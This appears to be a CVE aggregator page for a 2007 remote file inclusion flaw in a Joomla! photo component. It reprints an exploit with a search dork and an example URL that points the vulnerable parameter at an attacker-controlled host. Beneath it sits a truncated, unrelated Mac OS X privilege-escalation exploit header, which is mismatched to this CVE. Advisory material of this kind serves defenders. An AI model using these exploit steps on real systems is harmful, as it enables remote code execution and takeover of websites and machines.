CVE-2007-4954
published 2007-09-18CVE-2007-4954: PHP remote file inclusion vulnerability in admin.joom12pic.php in the joom12Pic (com_joom12pic) 1.0 component for Joomla! allows remote attackers to execute…
PriorityP349medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
28.75%
97.9th percentile
PHP remote file inclusion vulnerability in admin.joom12pic.php in the joom12Pic (com_joom12pic) 1.0 component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_live_site parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | joom12pic_component | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component joom12pic 1.0 - Remote File Inclusion
exploitdb·2007-09-16
CVE-2007-4954 Joomla! Component joom12pic 1.0 - Remote File Inclusion
Joomla! Component joom12pic 1.0 - Remote File Inclusion
---
######################################
# Joom!12Pic Component RFI #
######################################
Bug in :
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Variable : $mosConfig_live_site
Dork: "com_joom12pic"
Example:
http://xxx.net/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=[attacker]
Greets to all Irc.RealWorm.Net #Morgan Users ;)
# milw0rm.com [2007-09-16]
Exploit-DB
Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
exploitdb·2007-01-29
CVE-2007-0467 Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
---
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre
# Lance M. Havok
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 [email protected]..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld...
# 0000370: 0c00 0000 3400 000
No writeups or analysis indexed.
http://secunia.com/advisories/26849http://www.securityfocus.com/bid/25691https://exchange.xforce.ibmcloud.com/vulnerabilities/36639https://www.exploit-db.com/exploits/4416http://secunia.com/advisories/26849http://www.securityfocus.com/bid/25691https://exchange.xforce.ibmcloud.com/vulnerabilities/36639https://www.exploit-db.com/exploits/4416
2007-09-18
Published